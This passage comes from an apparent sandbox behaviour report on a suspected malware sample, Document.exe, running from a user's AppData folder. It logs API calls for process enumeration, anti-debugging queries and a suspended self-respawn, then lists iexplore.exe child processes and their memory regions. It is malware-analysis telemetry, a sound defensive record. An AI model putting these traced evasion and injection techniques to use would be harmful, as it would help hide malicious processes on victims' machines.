th32ParentProcessID=0xa38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.445] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.446] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="wmiprvse.exe")) returned 0 [0213.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6f4, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0213.446] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f944, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f944, ReturnLength=0x0) returned 0x0 [0213.446] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f940, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f940, ReturnLength=0x0) returned 0xc0000353 [0213.447] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554" [0213.447] CallWindowProcW (lpPrevWndFunc=0x2d0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x58bb90 [0213.447] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554", pNumArgs=0x18f944 | out: pNumArgs=0x18f944) returned 0x58bb90*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0213.447] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0213.448] Process32FirstW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.449] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.449] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.450] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.450] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.451] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.451] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.452] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.452] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.453] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.454] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.454] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.455] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.455] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.456] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.456] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.457] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.457] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.458] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.459] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.459] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.460] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.461] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.461] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0213.462] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.462] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.463] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="easily.exe")) returned 1 [0213.463] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stockportsconvenient.exe")) returned 1 [0213.464] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dangerous.exe")) returned 1 [0213.464] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retained_one_psychology.exe")) returned 1 [0213.465] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x760, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pentium-southampton.exe")) returned 1 [0213.466] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0213.466] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="credit-albania.exe")) returned 1 [0213.467] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="celebrate.exe")) returned 1 [0213.467] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watson_block.exe")) returned 1 [0213.468] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beef-http-plants.exe")) returned 1 [0213.468] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hunting garmin marriage.exe")) returned 1 [0213.469] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portsmouth_sauce_certificates.exe")) returned 1 [0213.469] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="insights hu.exe")) returned 1 [0213.470] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stroke_enough_reporter.exe")) returned 1 [0213.470] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="por tramadol started.exe")) returned 1 [0213.471] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="add.exe")) returned 1 [0213.471] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentinasovietavg.exe")) returned 1 [0213.472] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0213.472] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.473] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0213.474] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.474] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.475] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.475] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.476] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0213.476] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0213.477] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x81c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0213.477] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.478] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.478] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.479] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ec8c | out: lppe=0x18ec8c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0213.479] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6d8, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0213.479] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f8e0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f928 | out: lpCommandLine=0x0, lpProcessInformation=0x18f928*(hProcess=0xf0, hThread=0xec, dwProcessId=0xb6c, dwThreadId=0xb84)) returned 1 [0213.482] ExitProcess (uExitCode=0x0) Process: id = "10" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x65805000" os_pid = "0xabc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xa38" cmd_line = " C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1672 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1673 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1674 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1675 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1676 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1677 start_va = 0x290000 end_va = 0x335fff entry_point = 0x290000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 1678 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1679 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1680 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1681 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1682 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1683 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1684 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1685 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1686 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1687 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1688 start_va = 0x640000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1689 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1690 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1691 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 77 os_tid = 0xad8 Process: id = "11" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x49b37000" os_pid = "0x35c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xa38" cmd_line = " C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1693 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1694 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1695 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") 